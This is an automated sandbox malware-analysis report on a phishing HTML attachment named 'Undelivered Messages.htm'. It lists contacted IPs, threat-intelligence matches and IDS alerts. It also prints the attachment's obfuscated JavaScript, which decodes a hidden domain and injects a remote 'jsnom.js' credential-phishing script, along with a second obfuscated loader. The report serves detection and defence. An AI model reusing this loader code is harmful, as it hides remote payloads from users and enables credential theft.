https://rsolomakhin.github.io/pix/.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://www.ultrafarma.com.br/checkout/confirmacao/.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://www.hering.com.br/checkout/#/payment	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://checkout.pontofrio.com.br/compra-finalizada	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://www.natura.com.br/pedido-concluido/.	optimization-hints.pb.0.dr	false		high
https://www.anacapri.com.br/checkout/order-confirmation/.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://www.schutz.com.br/checkout/order-confirmation/.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://emv-qr.googleplex.com/.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://www.centauro.com.br/checkouts/confirmacao/.	optimization-hints.pb.0.dr	false		high
https://www.netshoes.com.br/checkout/confirmation/.	optimization-hints.pb.0.dr	false		high
https://123milhas.com/v2/busca/confirmacao-pedido/.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://www.paodeacucar.com/checkout.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://www.arezzo.com.br/checkout/order-confirmation/.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://comprasegura.olx.com.br/	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://m.americanas.com.br/compra/pix.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://sacolamobile.magazineluiza.com.br/#/comprovante	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://www.fastshop.com.br/web/checkout-v2/pagamento/confirmacao.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://www.zzmall.com.br/checkout/order-confirmation/.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.196.150	unknown	United States	13335	CLOUDFLARENETUS	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
18.245.31.5	d2vgu95hoyrpkh.cloudfront.net	United States	16509	AMAZON-02US	false
142.250.185.164	www.google.com	United States	15169	GOOGLEUS	false
104.21.84.200	fiveradio-newbam.com	United States	13335	CLOUDFLARENETUS	true
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
192.168.2.6

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587421
Start date and time:	2025-01-10 11:13:51 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Undelivered Messages.htm
Detection:	MAL
Classification:	mal60.phis.winHTM@30/32@12/8
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .htm

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.67, 173.194.76.84, 142.250.186.78, 142.250.184.206, 172.217.16.138, 216.58.212.138, 142.250.186.170, 142.250.74.202, 142.250.186.106, 142.250.185.138, 142.250.186.74, 142.250.184.202, 142.250.186.42, 142.250.181.234, 142.250.185.74, 172.217.18.106, 142.250.186.138, 216.58.212.170, 142.250.185.234, 142.250.185.202, 199.232.214.172, 192.229.221.95, 142.250.185.142, 172.217.18.14, 142.250.185.78, 142.250.181.238, 172.217.16.195, 34.104.35.123, 216.58.212.142, 142.250.185.174, 142.250.186.46, 216.58.206.35, 184.28.90.27, 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information

Input	Output
URL: file:///C:/Users/user/Desktop/Undelivered%20Messa... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "This script exhibits several moderate-risk indicators, including obfuscated code, external data transmission, and aggressive DOM manipulation. While the intent is not immediately clear, the use of obfuscation and the dynamic loading of a script from an external domain raise concerns and warrant further investigation." }
var _0x43beb2 = _0x21bf; function _0x1afa() { var _0xbe497f = ['687249ffkxse', '2968725wQTzfx', 'cG9pbnQ=', '80MUnirX', '3235tBpiPk', 'createElement', 'getElementById', '7436mWMQqc', '720664gEXMZn', 'getAttribute', '15097670FTBstH', 'dHlwZQ==', 'head', 'appendChild', 'L2pzbm9tLmpz', 'c2NyaXB0', '13548096fTWpBI', '22FYOXgF', 'dGV4dC9qYXZhc2NyaXB0', 'setAttribute', 'aHRtbA==', '4sDsJit', '2762688GAMQTe']; _0x1afa = function() { return _0xbe497f; }; return _0x1afa(); }(function(_0x25d612, _0x14888f) { var _0x27708e = _0x21bf, _0x2f8b98 = _0x25d612(); while (!![]) { try { var _0xe6fe9a = parseInt(_0x27708e(0x1d4)) / 0x1 * (-parseInt(_0x27708e(0x1d2)) / 0x2) + -parseInt(_0x27708e(0x1d5)) / 0x3 + parseInt(_0x27708e(0x1c4)) / 0x4 * (parseInt(_0x27708e(0x1c1)) / 0x5) + -parseInt(_0x27708e(0x1d3)) / 0x6 + parseInt(_0x27708e(0x1c5)) / 0x7 * (parseInt(_0x27708e(0x1c0)) / 0x8) + -parseInt(_0x27708e(0x1cd)) / 0x9 + parseInt(_0x27708e(0x1c7)) / 0xa * (parseInt(_0x27708e(0x1ce)) / 0xb); if (_0xe6fe9a === _0x14888f) break; else _0x2f8b98['push'](_0x2f8b98['shift']()); } catch (_0x30b4e5) { _0x2f8b98['push'](_0x2f8b98['shift']()); } } }(_0x1afa, 0xe116a)); var s1332b3c8402e79708c89d0c30f1550311062fc02 = atob(document[_0x43beb2(0x1c3)](atob(_0x43beb2(0x1d1)))[_0x43beb2(0x1c6)](atob(_0x43beb2(0x1d6)))), se2123499caf1447979e36dbdc114682a199ada70_495c59a4bcc92011d7d696d4fc595b67f61f89e7 = document[_0x43beb2(0x1c2)](atob(_0x43beb2(0x1cc))); function _0x21bf(_0x4714fc, _0x95a644) { var _0x1afa5b = _0x1afa(); return _0x21bf = function(_0x21bf54, _0x445222) { _0x21bf54 = _0x21bf54 - 0x1c0; var _0x3658e1 = _0x1afa5b[_0x21bf54]; return _0x3658e1; }, _0x21bf(_0x4714fc, _0x95a644); } se2123499caf1447979e36dbdc114682a199ada70_495c59a4bcc92011d7d696d4fc595b67f61f89e7[_0x43beb2(0x1d0)](atob('c3Jj'), s1332b3c8402e79708c89d0c30f1550311062fc02 + atob(_0x43beb2(0x1cb))), se2123499caf1447979e36dbdc114682a199ada70_495c59a4bcc92011d7d696d4fc595b67f61f89e7[_0x43beb2(0x1d0)](atob(_0x43beb2(0x1c8)), atob(_0x43beb2(0x1cf))), document[_0x43beb2(0x1c9)][_0x43beb2(0x1ca)](se2123499caf1447979e36dbdc114682a199ada70_495c59a4bcc92011d7d696d4fc595b67f61f89e7);
URL: file:///C:/Users/user/Desktop/Undelivered%20Messa... Model: Joe Sandbox AI	{ "risk_score": 7, "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. It creates a script element, sets its source to a third-party domain, and appends it to the document. This behavior is suspicious and could potentially lead to the execution of malicious code or the leakage of sensitive user data." }
var _0x2c16f1 = _0x3d83; function _0x511a() { var _0x4039c3 = ['576808qievVR', '2275432jJgHeU', '201123DIgULM', 'c3Jj', '11iQpRed', 'aW50ZWdyaXR5', 'setAttribute', 'preventDefault', '552342ADOcyy', '3942jDaUGH', '1371060DyGzVP', '10453910snslVZ', 'appendChild', '2235ddqsUn', '3zKGMKB', 'c2hhMzg0LWM3OUdONVZzdW5admkrUS9XT2JnazJpbjBDYlpzSG5qRXF2RnhDNUR4SG45bFRmTmNlMldXNmgycEg2dS9rRis=', 'c2NyaXB0', 'head', 'Y3Jvc3NvcmlnaW4=', '2KdTmHf', 'Y29udGV4dG1lbnU=', 'createElement']; _0x511a = function() { return _0x4039c3; }; return _0x511a(); }(function(_0x345e14, _0x4731ba) { var _0x1f6e34 = _0x3d83, _0x298e00 = _0x345e14(); while (!![]) { try { var _0x57b590 = -parseInt(_0x1f6e34(0x89)) / 0x1 * (parseInt(_0x1f6e34(0x84)) / 0x2) + parseInt(_0x1f6e34(0x7f)) / 0x3 * (parseInt(_0x1f6e34(0x87)) / 0x4) + -parseInt(_0x1f6e34(0x94)) / 0x5 * (parseInt(_0x1f6e34(0x90)) / 0x6) + -parseInt(_0x1f6e34(0x8f)) / 0x7 + -parseInt(_0x1f6e34(0x88)) / 0x8 + -parseInt(_0x1f6e34(0x91)) / 0x9 + -parseInt(_0x1f6e34(0x92)) / 0xa * (-parseInt(_0x1f6e34(0x8b)) / 0xb); if (_0x57b590 === _0x4731ba) break; else _0x298e00['push'](_0x298e00['shift']()); } catch (_0x22a4a7) { _0x298e00['push'](_0x298e00['shift']()); } } }(_0x511a, 0x2bbac)); function _0x3d83(_0x35ae86, _0x53d686) { var _0x511a61 = _0x511a(); return _0x3d83 = function(_0x3d83b0, _0x58e414) { _0x3d83b0 = _0x3d83b0 - 0x7f; var _0x3f6c3b = _0x511a61[_0x3d83b0]; return _0x3f6c3b; }, _0x3d83(_0x35ae86, _0x53d686); } var sc = document[_0x2c16f1(0x86)](atob(_0x2c16f1(0x81))); sc['setAttribute'](atob(_0x2c16f1(0x8a)), atob('aHR0cHM6Ly9jZG4uc29ja2V0LmlvLzQuNi4wL3NvY2tldC5pby5taW4uanM=')), sc[_0x2c16f1(0x8d)](atob(_0x2c16f1(0x8c)), atob(_0x2c16f1(0x80))), sc[_0x2c16f1(0x8d)](atob(_0x2c16f1(0x83)), atob('YW5vbnltb3Vz')), sc[_0x2c16f1(0x8d)](atob('dHlwZQ=='), atob('dGV4dC9qYXZhc2NyaXB0')), document[_0x2c16f1(0x82)][_0x2c16f1(0x93)](sc), document['addEventListener'](atob(_0x2c16f1(0x85)), _0x13f760 => _0x13f760[_0x2c16f1(0x8e)]());
URL: https://fiveradio-newbam.com/jsnom.js... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "This appears to be a suspected phishing site, which is a high-risk scenario. The page contains indicators of malicious intent, such as redirecting users to an unknown domain and attempting to collect personal information. The presence of a 'Dismiss this warning and enter site' button further suggests this is a malicious attempt to bypass security measures and compromise user data. Overall, the behaviors exhibited in this snippet indicate a high-risk, potentially malicious script." }
<!DOCTYPE html> [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]--> <head> <title>Suspected phishing site \| Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> [if gte IE 10]> > <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-wrapper cf-header cf-error-overview"> <h1 class="cf-text-error"><i class="cf-icon-exclamation-sign"></i> Warning: Suspected Phishing Site Ahead!</h1> <h2 class="cf-subheadline">This link has been flagged as phishing. We suggest you avoid it.</h2> </div> /.header --> <section></section> spacer --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GET"> <input type="hidden" name="atok" value="udaGbn_zrBuD7jbkOUqjPXWlFAt2ORbS9iogQq6frM4-1736504092-0.0.1.1-/jsnom.js"> <button type="submit" class="cf-btn cf-btn-danger" data-translate="dismiss_and_enter">Dismiss this warning and enter site</button> </form> </p> </div> <div class="cf-column"> <h2>What can I do?</h2> <p><strong>If you're a visitor of this website</strong><br /> The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.</p> <p><strong>If you're the owner of this website</strong><br /> Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.</p> </div> </div> </div> /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ffbe71078948c59</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & secu
URL: :// Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: ://

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.196.150	https://game-repack.site/2024/09/26/bloodborne	Get hash	malicious	Unknown	Browse
	faturas_dsp.qs.pt_Wednesday, June 5, 2024.html	Get hash	malicious	HTMLPhisher	Browse
	Budget_Statement.htm	Get hash	malicious	HTMLPhisher	Browse
	0055-fac_aftral.com_Thursday, June 20, 2024.html	Get hash	malicious	HTMLPhisher	Browse
	https://ipfs.io/ipfs/bafkreigaatqmy2dep6ftrscv6trkpbmzbh4xy3oaecv4mhhl3rwhrsdpxy	Get hash	malicious	HTMLPhisher	Browse
	http://fiveradio-newbam.com	Get hash	malicious	Unknown	Browse
	https://fiveradio-newbam.com	Get hash	malicious	Unknown	Browse
	messages undelivered.htm_	Get hash	malicious	HTMLPhisher	Browse
	REF# 5495941179-documentation 2032Pfile.msg	Get hash	malicious	HTMLPhisher	Browse
	https://telescope.ac/vasquez-law-firm-pllc/wvc6cjldgiynavw0rm64p1	Get hash	malicious	HTMLPhisher	Browse
239.255.255.250	https://github.com/netwrix/pingcastle/releases/download/3.3.0.1/PingCastle_3.3.0.1.zip	Get hash	malicious	Unknown	Browse
	http://www.efnhdh.blogspot.mk/	Get hash	malicious	GRQ Scam	Browse
	https://sos-de-muc-1.exo.io	Get hash	malicious	Unknown	Browse
	https://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29t	Get hash	malicious	Unknown	Browse
	http://www.singhs.lv	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	6ruXkfgh.js	Get hash	malicious	Unknown	Browse
	http://18ofcontents.shop	Get hash	malicious	Unknown	Browse
	https://www.dcamarketintelligence.com/tdt	Get hash	malicious	Unknown	Browse
	http://steamcommunuiity.com	Get hash	malicious	Unknown	Browse
	https://cdn.btmessage.com/	Get hash	malicious	HTMLPhisher	Browse
18.245.31.5	Play_vm_Message_for_Melissa.medina_wav_ .htm	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse
	https://pzpvsr8w.r.us-west-2.awstrack.me/L0/https:%2F%2Flmmoya.online%2Fcave.html/1/010101933f26e1e0-1115fe0b-5025-44be-8af4-15d6df5c778e-000000/HfxdUzBUygbU0CHkcLEJKW7Wybk=401	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse
	Updated_Proposal_20241113_pdf_banca.pdf	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse
	https://ampa.fi/uEvMZCXCvX	Get hash	malicious	Unknown	Browse
	https://t.ly/Bv1rG	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse
	https://www.hopp.bio/hawksridgefarms	Get hash	malicious	Mamba2FA	Browse
	https://thaykinhgiasoc.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU9USlBZakE9JnVpZD1VU0VSMTcxMDIwMjRVMDAxMDE3NDA=N0123N	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse
	EFT Remittance_CQDM.html	Get hash	malicious	Mamba2FA	Browse
	Leg AdobeShareFile62532.pdf.eml (21.8 KB).msg	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse
	Transcript_Sh03 summit bhc.html	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fiveradio-newbam.com	http://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy	Get hash	malicious	Unknown	Browse	104.21.84.200
	faturas_dsp.qs.pt_Wednesday, June 5, 2024.html	Get hash	malicious	HTMLPhisher	Browse	172.67.196.150
	Budget_Statement.htm	Get hash	malicious	HTMLPhisher	Browse	104.21.84.200
	0055-fac_aftral.com_Thursday, June 20, 2024.html	Get hash	malicious	HTMLPhisher	Browse	104.21.84.200
	ATT0100556_socage.it_Tuesday, May 28, 2024 (1).html	Get hash	malicious	HTMLPhisher	Browse	104.21.84.200
	https://ipfs.io/ipfs/bafkreigaatqmy2dep6ftrscv6trkpbmzbh4xy3oaecv4mhhl3rwhrsdpxy	Get hash	malicious	HTMLPhisher	Browse	172.67.196.150
	http://fiveradio-newbam.com	Get hash	malicious	Unknown	Browse	104.21.84.200
	https://fiveradio-newbam.com	Get hash	malicious	Unknown	Browse	172.67.196.150
	messages undelivered.htm_	Get hash	malicious	HTMLPhisher	Browse	172.67.196.150
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:eb3f4f83-6827-434b-9ee1-0182d3babf87	Get hash	malicious	HTMLPhisher	Browse	104.21.84.200
d2vgu95hoyrpkh.cloudfront.net	https://sites.google.com/kula.ai/rdps/home	Get hash	malicious	HTMLPhisher	Browse	52.222.144.22
	https://app.seesaw.me/pages/shared_item?item_id=item.458620ed-6ab6-4874-8a90-aa31b75d3cd6&share_token=lEkLLLT6TUehqWhupDFOAA&mode=share	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	18.165.220.15
	https://www.scrolldroll.com/best-dialogues-from-asur/	Get hash	malicious	Unknown	Browse	18.165.220.75
	https://t.ly/ShNFU	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.35.58.12
	https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.35.58.71
	https://viewstripo.email/680864d7-5609-4e6a-8914-c4d257d4c5ee1731949744848	Get hash	malicious	Unknown	Browse	18.245.31.78
	https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	18.245.31.78
	Play_vm_Message_for_Melissa.medina_wav_ .htm	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	18.245.31.5
	https://pzpvsr8w.r.us-west-2.awstrack.me/L0/https:%2F%2Flmmoya.online%2Fcave.html/1/010101933f26e1e0-1115fe0b-5025-44be-8af4-15d6df5c778e-000000/HfxdUzBUygbU0CHkcLEJKW7Wybk=401	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.35.58.71
	https://url11.kmt4ispayroll.com/?id=eyJlbWFpbF9pZCI6ImRnVER4d2NEQVAyTURfeU1Ed0dUSlVtb194VC0xeUp6Wk-t3aldrdz0iLCJocmVmIjoiaHR0cHM6Ly90Lm1lL3N0YWN5X215YnJvY2FyZCIs-ImludGVybmFsIjoiYzNjNzA3MDhmYzM5ZmQ4YzBmIiwibGlua19pZCI6ODY4fQ-e06f9243688f8d3f6986ffbedf3a11c620bbea820e86e17c3fd3a4979cbc3e26AOMMRkVTE4y4i4MhR8PO5Li1enwscIrfMMFkF0FdObryKs8IHKZe9lNXxCYB	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.35.58.12

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	driver.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	XClient.exe	Get hash	malicious	XWorm	Browse	104.20.4.235
	http://www.efnhdh.blogspot.mk/	Get hash	malicious	GRQ Scam	Browse	172.67.12.83
	gem1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	http://pdfdrive.com.co	Get hash	malicious	Unknown	Browse	104.21.11.245
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	https://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29t	Get hash	malicious	Unknown	Browse	172.66.43.95
	http://www.singhs.lv	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.18.11.207
	http://18ofcontents.shop	Get hash	malicious	Unknown	Browse	104.21.96.1
	https://www.dcamarketintelligence.com/tdt	Get hash	malicious	Unknown	Browse	104.26.15.92
AMAZON-02US	arm7.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	Client.exe	Get hash	malicious	AsyncRAT	Browse	35.154.189.194
	1162-201.exe	Get hash	malicious	FormBook	Browse	76.223.67.189
	https://cdn.btmessage.com/	Get hash	malicious	HTMLPhisher	Browse	52.211.89.170
	3.elf	Get hash	malicious	Unknown	Browse	18.151.37.43
	http://www.jmclmedia.ph	Get hash	malicious	Unknown	Browse	13.32.121.98
	5.elf	Get hash	malicious	Unknown	Browse	34.248.106.44
	6.elf	Get hash	malicious	Unknown	Browse	13.213.186.124
	https://ik.imagekit.io/nrof2h909/Sherman%20Pruitt,%20Chief%20of%20Police,%20MSCJ.pdf?updatedAt=1736444487005	Get hash	malicious	Unknown	Browse	65.9.66.13
	armv6l.elf	Get hash	malicious	Unknown	Browse	3.65.161.32
CLOUDFLARENETUS	driver.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	XClient.exe	Get hash	malicious	XWorm	Browse	104.20.4.235
	http://www.efnhdh.blogspot.mk/	Get hash	malicious	GRQ Scam	Browse	172.67.12.83
	gem1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	http://pdfdrive.com.co	Get hash	malicious	Unknown	Browse	104.21.11.245
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	https://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29t	Get hash	malicious	Unknown	Browse	172.66.43.95
	http://www.singhs.lv	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.18.11.207
	http://18ofcontents.shop	Get hash	malicious	Unknown	Browse	104.21.96.1
	https://www.dcamarketintelligence.com/tdt	Get hash	malicious	Unknown	Browse	104.26.15.92

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\_platform_specific\win_x64\widevinecdm.dll	AllItems.htm	Get hash	malicious	HTMLPhisher	Browse
	#Employee-Letter.pdf	Get hash	malicious	Unknown	Browse
	SmartEasyPDF.msi	Get hash	malicious	Unknown	Browse
	pdfguruhub.msi	Get hash	malicious	Unknown	Browse
	allpdfpro.msi	Get hash	malicious	Unknown	Browse
	Complete_with_DocuSign_49584.pdf	Get hash	malicious	HTMLPhisher	Browse
	https://averellharriman.sharefile.com/public/share/web-sab7e0a816d3e4e0ca3a0899254901a6d	Get hash	malicious	Unknown	Browse
	DRL-272112.htm	Get hash	malicious	Unknown	Browse
	View alert details #20GBQ4J.html	Get hash	malicious	HTMLPhisher	Browse
	shelbycountytn.gov.pdf	Get hash	malicious	Unknown	Browse

Source: 0.0.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/Undelivered%20Messa... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. It creates a script element, sets its source to a third-party domain, and appends it to the document. This behavior is suspicious and could potentially lead to the execution of malicious code or the leakage of sensitive user data.
Source: 1.3..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://fiveradio-newbam.com/jsnom.js... This appears to be a suspected phishing site, which is a high-risk scenario. The page contains indicators of malicious intent, such as redirecting users to an unknown domain and attempting to collect personal information. The presence of a 'Dismiss this warning and enter site' button further suggests this is a malicious attempt to bypass security measures and compromise user data. Overall, the behaviors exhibited in this snippet indicate a high-risk, potentially malicious script.

Source: Undelivered Messages.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Undelivered%20Messages.htm	HTTP Parser: No favicon

Source: Network traffic	Suricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.4:49741 -> 104.21.84.200:443
Source: Network traffic	Suricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.4:49746 -> 172.67.196.150:443

Source: Joe Sandbox View	IP Address: 172.67.196.150 172.67.196.150
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 18.245.31.5 18.245.31.5

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.42
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.42
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.42
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.42
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: nullsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
